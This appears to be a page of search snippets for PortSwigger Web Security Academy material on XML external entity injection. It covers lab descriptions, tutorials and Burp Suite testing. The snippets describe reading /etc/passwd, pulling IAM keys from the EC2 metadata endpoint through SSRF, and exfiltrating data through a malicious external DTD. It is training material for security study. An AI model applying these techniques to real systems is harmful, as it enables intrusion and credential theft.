
XML external entity (XXE) injection - PortSwigger
In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE injection, and summarize how to prevent XXE injection attacks.
Lab: Exploiting XXE via image file upload - PortSwigger
Lab: Exploiting XXE via image file upload PRACTITIONER This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.
Lab: Exploiting XXE to perform SSRF attacks - PortSwigger
To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server's IAM secret access key from the EC2 metadata endpoint.
What is a blind XXE attack? Tutorial & Examples - PortSwigger
What an attacker really wants to achieve is to exfiltrate sensitive data. This can be achieved via a blind XXE vulnerability, but it involves the attacker hosting a malicious DTD on a system that they control, and then invoking the external DTD from within the in-band XXE payload.
Testing for XXE injection vulnerabilities with Burp Suite
Dec 19, 2024 · You can use Burp to test for XXE injection vulnerabilities: Professional Use Burp Scanner to automatically flag potential vulnerabilities. Use Burp Repeater to manually test for vulnerabilities, or investigate any vulnerabilities further.
Lab: Exploiting XInclude to retrieve files | Web Security Academy
Because you don't control the entire XML document you can't define a DTD to launch a classic XXE attack. To solve the lab, inject an XInclude statement to retrieve the contents of the /etc/passwd file.
Lab: Exploiting XXE using external entities to retrieve files
Replace the productId number with a reference to the external entity: &xxe;. The response should contain "Invalid product ID:" followed by the contents of the /etc/passwd file. Community solutions
Guide to XML entities with examples | Web Security Academy
In this section, we'll explain some key features of XML that are relevant to understanding XXE vulnerabilities. What is XML? XML stands for "extensible markup language". XML is a language designed for storing and transporting data. Like HTML, XML uses a …
Lab: Exploiting blind XXE to exfiltrate data using a malicious …
Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD PRACTITIONER This lab has a "Check stock" feature that parses XML input but does not display the result.
Lab: Blind XXE with out-of-band interaction - PortSwigger
You can detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain. To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.